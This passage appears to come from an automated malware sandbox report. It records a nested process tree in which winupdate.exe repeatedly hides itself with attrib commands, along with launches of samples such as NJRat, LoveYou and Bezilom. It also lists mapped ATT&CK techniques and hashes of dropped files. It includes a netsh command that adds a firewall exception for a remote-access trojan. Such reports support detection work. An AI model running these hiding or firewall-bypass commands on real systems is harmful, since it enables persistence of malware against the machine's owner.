        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        23⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        23⤵
        Sets file to hidden
        
        PID:544
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        23⤵
        
        PID:2780
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        24⤵
        
        PID:1064
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        24⤵
        Views/modifies file attributes
        
        PID:3136
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        24⤵
        Sets file to hidden
        
        PID:3144
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        24⤵
        
        PID:3284
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        25⤵
        
        PID:3452
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        25⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3632
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        25⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        25⤵
        
        PID:3724
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        26⤵
        
        PID:3756
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4056
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        26⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4064
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        26⤵
        
        PID:316
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        27⤵
        
        PID:2604
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        27⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3200
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        27⤵
        Views/modifies file attributes
        
        PID:3204
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        27⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        28⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        28⤵
        Views/modifies file attributes
        
        PID:932
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        28⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3708
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        28⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        29⤵
        
        PID:3952
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        29⤵
        
        PID:3272
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        29⤵
        Views/modifies file attributes
        
        PID:3264
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        29⤵
        
        PID:532
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        30⤵
        
        PID:2164
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        30⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3196
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        30⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3596
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        30⤵
        
        PID:3528
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        31⤵
        
        PID:3444
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        31⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3852
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        31⤵
        Sets file to hidden
        
        PID:3864
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        31⤵
        
        PID:3780
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        32⤵
        
        PID:4088
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        32⤵
        Views/modifies file attributes
        
        PID:2004
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        32⤵
        Views/modifies file attributes
        
        PID:2968
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        32⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        33⤵
        
        PID:3360
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        33⤵
        
        PID:3640
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        33⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2560
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        33⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        34⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        34⤵
        Sets file to hidden
        
        PID:3648
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        34⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1920
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        34⤵
        
        PID:2172
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        35⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        35⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3484
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        35⤵
        Sets file to hidden
        
        PID:316
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        35⤵
        
        PID:924
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        36⤵
        
        PID:3916
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        36⤵
        Sets file to hidden
        
        PID:4084
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        36⤵
        Sets file to hidden
        
        PID:3752
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        36⤵
        
        PID:1880
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        37⤵
        
        PID:3204
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        37⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3564
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        37⤵
        
        PID:3484
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        37⤵
        
        PID:1320
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        38⤵
        
        PID:3860
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        38⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3944
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        38⤵
        
        PID:3796
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        38⤵
        
        PID:3088
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        39⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        39⤵
        Sets file to hidden
        
        PID:3408
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        39⤵
        Views/modifies file attributes
        
        PID:3460
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        39⤵
        
        PID:1720
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        40⤵
        
        PID:3636
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        40⤵
        Views/modifies file attributes
        
        PID:4060
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        40⤵
        Views/modifies file attributes
        
        PID:3988
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        40⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        41⤵
        
        PID:3092
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        41⤵
        
        PID:3592
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        41⤵
        Views/modifies file attributes
        
        PID:3500
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        41⤵
        
        PID:2812
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        42⤵
        
        PID:2132
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        42⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3984
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        42⤵
        Sets file to hidden
        
        PID:3744
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        42⤵
        
        PID:3300
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        43⤵
        
        PID:3656
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        43⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3504
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        43⤵
        Views/modifies file attributes
        
        PID:3500
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        43⤵
        
        PID:3184
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        44⤵
        
        PID:316
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        44⤵
        Views/modifies file attributes
        
        PID:3988
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        44⤵
        Sets file to hidden
        
        PID:4072
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        44⤵
        
        PID:3112
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        45⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        45⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3544
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        45⤵
        Sets file to hidden
        
        PID:3996
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        45⤵
        
        PID:3524
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        46⤵
        
        PID:3976
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        46⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3216
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        46⤵
        Sets file to hidden
        
        PID:3520
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        46⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        47⤵
        
        PID:3748
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        47⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2308
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        47⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3864
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        47⤵
        
        PID:4064
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        48⤵
        
        PID:3904
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        48⤵
        Sets file to hidden
        
        PID:544
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        48⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3136
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        48⤵
        
        PID:3908
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        49⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        49⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3388
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        49⤵
        Views/modifies file attributes
        
        PID:1612
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        49⤵
        
        PID:3708
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        50⤵
        
        PID:2348
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        50⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1412
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        50⤵
        Views/modifies file attributes
        
        PID:1880
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        50⤵
        
        PID:3044
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        51⤵
        
        PID:3212
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        51⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:2172
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        51⤵
        Sets file to hidden
        
        PID:664
        
        C:\Windows\SysWOW64\Windupdt\winupdate.exe
        
        "C:\Windows\system32\Windupdt\winupdate.exe"
        51⤵
        
        PID:3884
        
        C:\Windows\SysWOW64\notepad.exe
        
        notepad
        52⤵
        
        PID:2000
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt\winupdate.exe" +s +h
        52⤵
        Sets file to hidden
        
        PID:3104
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib "C:\Windows\SysWOW64\Windupdt" +s +h
        52⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3944
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        51⤵
        
        PID:3280
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        50⤵
        
        PID:3476
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        49⤵
        
        PID:3148
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        48⤵
        
        PID:3368
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        47⤵
        
        PID:3156
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        46⤵
        
        PID:3720
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        45⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        44⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        43⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        42⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        41⤵
        
        PID:3288
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        40⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        39⤵
        
        PID:532
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        38⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        37⤵
        
        PID:1812
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        36⤵
        
        PID:2636
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        35⤵
        
        PID:2488
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        34⤵
        
        PID:1960
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        33⤵
        
        PID:2116
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        32⤵
        
        PID:2684
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        31⤵
        
        PID:3324
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        30⤵
        
        PID:3556
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        29⤵
        
        PID:3080
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        28⤵
        
        PID:3800
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        27⤵
        
        PID:3332
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        26⤵
        
        PID:2288
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        25⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        24⤵
        
        PID:3292
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        23⤵
        
        PID:944
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        22⤵
        
        PID:1156
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        21⤵
        
        PID:1932
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        20⤵
        
        PID:1972
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        19⤵
        
        PID:1736
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        18⤵
        
        PID:1964
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        17⤵
        
        PID:2216
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        16⤵
        
        PID:828
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        15⤵
        
        PID:2436
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        14⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        13⤵
        
        PID:1652
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        12⤵
        
        PID:1280
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        11⤵
        
        PID:2400
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        10⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        9⤵
        
        PID:736
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        8⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        7⤵
        
        PID:952
      - C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        6⤵
        
        PID:1728
    - - C:\Windows\SysWOW64\notepad.exe
        
        C:\Windows\SysWOW64\notepad.exe
        5⤵
        
        PID:2700
  - - C:\Windows\SysWOW64\notepad.exe
      C:\Windows\SysWOW64\notepad.exe
      4⤵
      PID:288
- - C:\Windows\SysWOW64\notepad.exe
    C:\Windows\SysWOW64\notepad.exe
    3⤵
    PID:2712
- C:\Windows\SysWOW64\notepad.exe
  C:\Windows\SysWOW64\notepad.exe
  2⤵
  PID:2348

C:\Users\Admin\Desktop\NJRat.exe
"C:\Users\Admin\Desktop\NJRat.exe"
1⤵
PID:2672
- C:\Windows\SysWOW64\netsh.exe
  netsh firewall add allowedprogram "C:\Users\Admin\Desktop\NJRat.exe" "NJRat.exe" ENABLE
  2⤵
  - Modifies Windows Firewall
  PID:3256

C:\Users\Admin\Desktop\Xpaj\xpaj.exe
"C:\Users\Admin\Desktop\Xpaj\xpaj.exe"
1⤵
PID:3228

C:\Users\Admin\Desktop\WinNuke.98.exe
"C:\Users\Admin\Desktop\WinNuke.98.exe"
1⤵
PID:3720

C:\Users\Admin\Desktop\LoveYou.exe
"C:\Users\Admin\Desktop\LoveYou.exe"
1⤵
PID:3592

C:\Users\Admin\Desktop\LoveYou.exe
"C:\Users\Admin\Desktop\LoveYou.exe"
1⤵
PID:2556

C:\Users\Admin\Desktop\Trojan\Nostart.exe
"C:\Users\Admin\Desktop\Trojan\Nostart.exe"
1⤵
PID:3424

C:\Users\Admin\Desktop\Trojan\Nostart.exe
"C:\Users\Admin\Desktop\Trojan\Nostart.exe"
1⤵
PID:3864

C:\Users\Admin\Desktop\Bezilom.exe
"C:\Users\Admin\Desktop\Bezilom.exe"
1⤵
PID:3984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Indicator Removal

T1070

Clear Persistence

T1070.009

Credential Access

Discovery

Browser Information Discovery

T1217

Password Policy Discovery

T1201

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Service Session Hijacking

T1563

RDP Hijacking

T1563.002

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Butterfly on Desktop\is-44TRH.tmp

Filesize
3.0MB

MD5
81aab57e0ef37ddff02d0106ced6b91e

SHA1
6e3895b350ef1545902bd23e7162dfce4c64e029

SHA256
a70f9e100dddb177f68ee7339b327a20cd9289fae09dcdce3dbcbc3e86756287

SHA512
a651d0a526d31036a302f7ef1ee2273bb7c29b5206c9b17339baa149dd13958ca63db827d09b4e12202e44d79aac2e864522aca1228118ba3dcd259fe1fcf717

Download Submit
C:\ProgramData\Microsoft\Intel\taskhost.exe

Filesize
3.6MB

MD5
c5ec8996fc800325262f5d066f5d61c9

SHA1
95f8e486960d1ddbec88be92ef71cb03a3643291

SHA256
892e0afefca9c88d43bdd1beea0f09faadef618af0226e7cd1acdb47e871a0db

SHA512
4721692047759aea6cb6e5c6abf72602c356ab826326779e126cda329fa3f7e4c468bdb651bb664cc7638a23fca77bc2d006a3fe0794badc09d6643d738e885a

Download Submit
C:\ProgramData\Microsoft\Intel\wini.exe

Filesize
4.5MB

MD5
f9a9b17c831721033458d59bf69f45b6

SHA1
472313a8a15aca343cf669cfc61a9ae65279e06b

SHA256
9276d1bb2cd48fdf46161deaf7ad4b0dbcef9655d462584e104bd3f2a8c944ce

SHA512
653a5c77ada9c4b80b64ae5183bc43102b32db75272d84be9201150af7f80d96a96ab68042a17f68551f60a39053f529bee0ec527e20ab5c1d6c100a504feda8

Download Submit
C:\ProgramData\Microsoft\Intel\winlogon.exe

Filesize
35KB

MD5
2f6a1bffbff81e7c69d8aa7392175a72

SHA1
94ac919d2a20aa16156b66ed1c266941696077da

SHA256
dc6d63798444d1f614d4a1ff8784ad63b557f4d937d90a3ad9973c51367079de

SHA512
ff09ef0e7a843b35d75487ad87d9a9d99fc943c0966a36583faa331eb0a243c352430577bc0662149a969dbcaa22e2b343bed1075b14451c4e9e0fe8fa911a37

Download Submit
C:\ProgramData\WindowsTask\winlogon.exe

Filesize
381KB

MD5
ec0f9398d8017767f86a4d0e74225506

SHA1
720561ad8dd165b8d8ad5cbff573e8ffd7bfbf36

SHA256
870ff02d42814457290c354229b78232458f282eb2ac999b90c7fcea98d16375

SHA512
d2c94614f3db039cbf3cb6ffa51a84d9d32d58cccabed34bf3c8927851d40ec3fc8d18641c2a23d6a5839bba264234b5fa4e9c5cb17d3205f6af6592da9b2484

Download Submit
C:\ProgramData\Windows\winit.exe

Filesize
961KB

MD5
03a781bb33a21a742be31deb053221f3

SHA1
3951c17d7cadfc4450c40b05adeeb9df8d4fb578

SHA256
e95fc3e7ed9ec61ba7214cc3fe5d869e2ee22abbeac3052501813bb2b6dde210

SHA512
010a599491a8819be6bd6e8ba3f2198d8f8d668b6f18edda4408a890a2769e251b3515d510926a1479cc1fa011b15eba660d97deccd6e1fb4f2d277a5d062d45

Download Submit
C:\ProgramData\install\del.bat

Filesize
61B

MD5
398a9ce9f398761d4fe45928111a9e18

SHA1
caa84e9626433fec567089a17f9bcca9f8380e62

SHA256
e376f2a9dda89354311b1064ea4559e720739d526ef7da0518ebfd413cd19fc1

SHA512
45255ffea86db71fcfcde1325b54d604a19276b462c8cca92cf5233a630510484a0ecb4d3e9f66733e2127c30c869c23171249cfac3bb39ff4e467830cd4b26b

Download Submit
C:\ProgramData\install\ink.exe

Filesize
112KB

MD5
ef3839826ed36f3a534d1d099665b909

SHA1
8afbee7836c8faf65da67a9d6dd901d44a8c55ca

SHA256
136590cb329a56375d6336b12878e18035412abf44c60bebdaa6c37840840040

SHA512
040c7f7b7a28b730c6b7d3fabc95671fe1510dac0427a49af127bdeb35c8643234730bf3824f627050e1532a0283895bd41fd8a0f5ac20a994accf81a27514f8

Download Submit
